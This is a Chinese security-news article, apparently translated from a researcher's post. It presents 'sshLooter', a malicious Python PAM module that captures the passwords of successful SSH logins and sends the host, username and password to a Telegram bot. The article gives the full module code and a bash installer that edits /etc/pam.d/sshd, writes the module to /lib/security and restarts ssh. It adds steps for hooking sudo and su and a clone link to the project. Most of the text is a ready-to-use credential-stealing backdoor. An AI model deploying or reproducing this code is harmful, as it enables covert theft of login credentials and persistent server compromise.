官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
窃取SSH凭证的另一种方法
- 关注
窃取SSH凭证的另一种方法
不久前,我曾写过一篇关于使用strace来获取ssh密码的文章。但该方法并不是时常有效的,因为在不同的发行版上strace的输出并不相同。所以在本文中,我将为大家介绍另外一种获取ssh密码的方法。这种方法是我在ChokePoint找到的 ,他向我们展示了如何使用python创建PAM模块记录失败的尝试,现在我要做的就是更改登录密码的地方。原脚本中当登录失败时,使用的auth_log函数。
if not check_pw(user, resp.resp):
auth_log("Remote Host: %s (%s:%s)" % (pamh.rhost, user, resp.resp))
return pamh.PAM_AUTH_ERR
return pamh.PAM_SUCCESS而在我的脚本中,当登录成功时使用的是我定义的函数sendMessage
if not check_pw(user, resp.resp):
return pamh.PAM_AUTH_ERR
sendMessage("Connection from host {} user:{} password: {})".format(pamh.rhost, user, resp.resp))
return pamh.PAM_SUCCESS该函数主要用于发送用户,密码以及连接的IP,以下是完整代码:
import spwd
import crypt
import requests
def sendMessage(msg):
apiKey = 'BOT-API-KEY'
userId = 'USERID'
url = 'https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}'.format(apiKey,userId,msg)
r = requests.get(url)
def check_pw(user, password):
"""Check the password matches local unix password on file"""
hashed_pw = spwd.getspnam(user)[1]
return crypt.crypt(password, hashed_pw) == hashed_pw
def pam_sm_authenticate(pamh, flags, argv):
try:
user = pamh.get_user()
except pamh.exception as e:
return e.pam_result
if not user:
return pamh.PAM_USER_UNKNOWN
try:
resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, 'Password:'))
except pamh.exception as e:
return e.pam_result
if not check_pw(user, resp.resp):
return pamh.PAM_AUTH_ERR
sendMessage("Connection from host {} user:{} password: {})".format(pamh.rhost, user, resp.resp))
return pamh.PAM_SUCCESS
def pam_sm_setcred(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_acct_mgmt(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_open_session(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_close_session(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_chauthtok(pamh, flags, argv):
return pamh.PAM_SUCCESS我还创建了一个bash脚本用于自动化的安装这个ssh keylogger,其中安装了所有的依赖关系,并在/etc/pam.d/sshd上配置了该PAM模块
#!/bin/bash
# Install dependencies to create a PAM module using python (Except for python-pip)
apt-get install python-pam libpam-python python-pip
# Install dependencies python
pip install requests
# Check if exist the entrie on pam, for this module
if ! grep -Fq "looter.py" /etc/pam.d/sshd;then
sed -i "/common-auth/a auth requisite pam_python.so looter.py" /etc/pam.d/sshd
fi
code='
import spwd
import crypt
import requests
def sendMessage(msg):
apiKey = "API-KEY"
userId = "USER-ID"
data = {"chat_id":userId,"text":msg}
url = "https://api.telegram.org/bot{}/sendMessage".format(apiKey)
r = requests.post(url,json=data)
def check_pw(user, password):
"""Check the password matches local unix password on file"""
hashed_pw = spwd.getspnam(user)[1]
return crypt.crypt(password, hashed_pw) == hashed_pw
def pam_sm_authenticate(pamh, flags, argv):
try:
user = pamh.get_user()
except pamh.exception as e:
return e.pam_result
if not user:
return pamh.PAM_USER_UNKNOWN
try:
resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, "Password:"))
except pamh.exception as e:
return e.pam_result
if not check_pw(user, resp.resp):
return pamh.PAM_AUTH_ERR
sendMessage("Connection from host {} using the user {} and password {}".format(pamh.rhost, user, resp.resp))
return pamh.PAM_SUCCESS
def pam_sm_setcred(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_acct_mgmt(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_open_session(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_close_session(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_chauthtok(pamh, flags, argv):
return pamh.PAM_SUCCESS
'
mkdir -p /lib/security/
echo "$code" > /lib/security/looter.py
/etc/init.d/ssh restart现在,只要有人成功登录了服务器,你就会收到以下的登录信息。
它也适用于sudo和su,只需添加以下代码
auth requisite pam_python.so looter.py到下面两个文件中
/etc/pam.d/sudo
/etc/pam.d/su或者你也可以直接git clone该项目并按照README.md上的说明进行操作
git clone https://github.com/mthbernardes/sshLooter.git*参考来源:mthbernardes,FB小编 secist 编译,转载请注明来自FreeBuf.COM
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者